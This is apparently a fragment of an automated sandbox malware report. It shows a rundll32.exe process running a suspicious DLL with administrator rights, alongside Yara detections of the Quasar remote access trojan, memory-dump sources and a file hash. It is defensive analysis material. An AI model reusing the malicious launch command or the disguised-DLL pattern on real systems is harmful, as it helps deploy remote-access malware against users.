                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                General

                                Target ID:19
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.1802596768.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                Disassembly

                                No disassembly